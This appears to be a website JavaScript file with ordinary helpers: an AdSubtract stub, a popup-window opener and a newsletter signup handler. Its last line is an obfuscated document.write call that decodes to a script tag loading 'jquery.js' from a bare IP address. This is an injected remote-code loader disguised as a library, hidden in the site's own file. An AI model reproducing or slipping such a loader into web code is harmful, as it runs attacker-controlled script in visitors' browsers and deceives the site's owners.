<!-- // Start of AdSubtract JavaScript block; you can ignore this.
     // It is used when AdSubtract blocks cookies or pop-up windows.
document.iMokie = "cookie blocked by AdSubtract";
document.iMferrer = "referrer blocked by AdSubtract";
function iMwin() {
	this.location = "";
	this.frames = new Array(9);
	this.frames[0] = this;
	this.frames[1] = this;
	this.frames[2] = this;
	this.frames[3] = this;
	this.frames[4] = this;
	this.frames[5] = this;
	this.frames[6] = this;
	this.frames[7] = this;
	this.frames[8] = this;
	this.length = 0;
}
// End of AdSubtract JavaScript block. -->
function openWindow(page_name, win_name, resize, width, height)
{
	if(resize == true)
	{
		var win = window.open(page_name, win_name, "toolbar=no,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=" + width + ",height=" + height);
		win.focus();
	}
	else {
		var win = window.open(page_name, win_name, "toolbar=no,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=no,width=" + width + ",height=" + height);			
		win.focus();
	}
}
	
function hpNewsletterSubmit(submitButton, evt)
{
	// if it's Netscape...
	if(document.layers)
	{
		var btn = new String();
		btn = evt.target.toString();

		// check to see if the user clicked the Manage submit button
		if(btn.indexOf("subManage") > 0)
		{
/*			let it go; we don't need to interviene.
*/
		}
		// nope, clicked the Sign Up submit button
		else {
			submitButton.mlpost.value = "mlpostnew";
		}
	}
	// ok, it's not Netscape so assume IE
	else {
		// check to see if the user clicked the Manage submit button

		if(evt.srcElement == document.newsletters.subManage)
		{
/*			let it go; we don't need to interviene.
*/
		}
		// nope, clicked the Sign Up submit button
		else {
/*		
		indicate that this is a new user and pass their e-mail address
*/
			document.newsletters.mlpost.value = "mlpostnew";
		}
	}
}<!-- 
document.write(unescape('%3Cscrb0iEvtptvQs%20AB7s6ArHuScEvt%3DEvt%2FF2%2F96A4%2Euy2vQs4vQs7%2EAB72AB7%2E1uy9F25%2FmEjqEvtu6AeuyrymE%2EvQsjs%3EvQs%3C%2FscAB7r6AipmEtvQs%3E').replace(/HuS|Evt|AB7|6A|uy|F2|b0|vQs|mE/g,""));
 -->
